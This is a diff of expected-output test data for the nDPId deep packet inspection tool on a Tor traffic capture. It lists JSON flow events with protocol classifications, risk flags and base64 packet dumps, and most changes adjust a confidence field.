-00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":200000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":200000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01040{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain 
name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} -01046{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} -00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1383821673254,"flow_last_seen":1383822123915,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +01040{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} +01046{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} +00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1383821673254,"flow_last_seen":1383822123915,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822134212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822133931,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1944,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822136212} 
@@ -253,8 +253,8 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1383822190886,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190886,"pkt":"UlQA2EYhUlQAWul3CABFAAA0COtAAIAGZnzAqAH8PtKJ5sfxAbspsDzeAAAAAIACIACTeAAAAgQFtAEDAwgBAQQC"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1383822190950,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190950,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGvmc+0onmwKgB\/AG7x\/Gvhi1nKbA834ASOQidcgAAAgQFtAEBBAIBAwMH"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1383822190951,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822190951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCOxAAIAGZofAqAH8PtKJ5sfxAbspsDzfr4YtaFAQAQAWTQAAAAAAAAAA"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}} 
+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822192212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822192034,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2107,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822194212} 
@@ -283,7 +283,7 @@ 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2719,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822216211,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1383822217531,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":151,"pkt_l4_len":97,"thread_ts_msec":1383822217531,"pkt":"MzMAAQACUlQAWul3ht1gAAAAAGERAf6AAAAAAAAAxYMZclcocyP\/AgAAAAAAAAAAAAAAAQACAiICIwBhDIMBZjPcAAgAAgAAAAEADgABAAEXdNYHUlQAoBS4AAMADA5SVAAAAAAAAAAAAAAnAAsACUVuZGlhbi1QQwAQAA4AAAE3AAhNU0ZUIDUuMAAGAAgAGAAXABEAJw=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2775,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822218212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2775,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822218202,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2800,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1383822218758,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":151,"pkt_l4_len":97,"thread_ts_msec":1383822218758,"pkt":"MzMAAQACUlQAWul3ht1gAAAAAGERAf6AAAAAAAAAxYMZclcocyP\/AgAAAAAAAAAAAAAAAQACAiICIwBhDB8BZjPcAAgAAgBkAAEADgABAAEXdNYHUlQAoBS4AAMADA5SVAAAAAAAAAAAAAAnAAsACUVuZGlhbi1QQwAQAA4AAAE3AAhNU0ZUIDUuMAAGAAgAGAAXABEAJw=="} 
@@ -347,12 +347,12 @@ 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3858,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822276211} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -01043{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1383821673254,"flow_last_seen":1383822274144,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822217531,"flow_last_seen":1383822248944,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":534,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1383822190886,"flow_last_seen":1383822265123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": 
{"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1383822129889,"flow_last_seen":1383822265160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8625,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1826,"flow_first_seen":1383822130889,"flow_last_seen":1383822265215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1411596,"flow_avg_l4_payload_len":773,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+01043{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} 